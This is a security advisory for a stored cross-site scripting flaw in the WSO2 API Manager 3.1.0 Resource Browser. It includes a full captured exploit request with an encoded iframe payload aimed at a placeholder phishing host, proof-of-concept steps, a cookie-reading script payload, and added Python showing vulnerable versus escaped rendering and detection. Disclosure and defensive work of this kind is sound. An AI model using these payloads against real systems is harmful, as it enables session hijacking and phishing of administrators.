# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
# Date: 2020-04-13
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Software link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700

Technical Details & Description:
================================

A remote stored cross-site scripting vulnerability has been discovered in the WSO2 API Manager Resource Browser component. The vulnerability allows a remote attacker with access to the "Resource Browser" component to inject malicious code through the Add Comment feature. It is triggered by sending a POST request to /carbon/info/comment-ajaxprocessor.jsp with the parameters "comment=targeted&path=%2F".

Remote attackers have the ability to spread malware, hijack a session (including a session with higher privileges), or initiate phishing attacks.

The security risk of the stored XSS web vulnerability is estimated as medium, with a CVSS (Common Vulnerability Scoring System) score of 5.4. Exploitation of the stored XSS web vulnerability requires a low-privilege web application user account and medium or high user interaction. Successful exploitation of the vulnerability results in compromise of the server.

Request Method:
[+] POST

Module:
[+] /carbon/info/comment-ajaxprocessor.jsp

Parameters:
[+] comment=admincomment
[+] path=%2F

=======================================

POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close

comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F

==============================

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144

// The body of the response includes the attacker's malicious script:

<a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right"> </a>
<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker

Proof of Concept (PoC):
=======================

// Let's suppose we're attacking an admin with higher privileges.

1. Attacker opens his account
2. Adds an arbitrary comment
3. Intercepts the request
4. Adds a malicious script to the comment
5. Admin accesses his account and wants to add a comment; the malicious script gets executed
===> Admin account compromised

===============================================================================
Example malicious script:

<script>
alert(document.cookie);
</script>
===============================================================================
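As an added example (not part of this advisory and not WSO2's code), the following Python decodes the captured POST body above, models the flawed pattern in which the comment is concatenated into the page as-is, shows the hardened form in which the comment is HTML-encoded at output, and flags comment submissions that carry tag syntax for log review. The rendering functions and the sample bodies are constructed for illustration only.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed copy of the POST body from the captured request above.
CAPTURED_BODY = "comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F"

# Constructed sample of bodies as they might appear in an access/audit log.
SAMPLE_BODIES = [
    "comment=looks+good&path=%2F",
    CAPTURED_BODY,
    "comment=%3Cscript%3Ealert(1)%3C%2Fscript%3E&path=%2Fapi",
]

# Anything that looks like the start of an HTML tag or comment after decoding.
TAG_LIKE = re.compile(r"<\s*/?[a-zA-Z!]")


def parse_comment_request(body: str) -> dict:
    """Decode the form-urlencoded body as the servlet container would."""
    params = parse_qs(body, keep_blank_values=True)
    return {
        "comment": params.get("comment", [""])[0],
        "path": params.get("path", [""])[0],
    }


def render_comment_vulnerable(comment: str, author: str) -> str:
    """Model of the flaw: user input is concatenated straight into the HTML."""
    return f"{comment}<br/>posted by {author}"


def render_comment_fixed(comment: str, author: str) -> str:
    """Hardened form: every user-controlled value is HTML-encoded before output."""
    return (
        f"{html.escape(comment, quote=True)}<br/>"
        f"posted by {html.escape(author, quote=True)}"
    )


def contains_markup(value: str) -> bool:
    """Detection helper: does the decoded comment contain tag-like syntax?"""
    return TAG_LIKE.search(value) is not None


def flag_comment_bodies(bodies: list) -> list:
    """Return the decoded comments from a batch of bodies that carry markup."""
    decoded = (parse_comment_request(b)["comment"] for b in bodies)
    return [c for c in decoded if contains_markup(c)]
```

The X-XSS-Protection and X-Frame-Options headers seen in the captured response do not prevent this: the payload is stored server-side and served as part of the page, so encoding at the point of output is the control that matters.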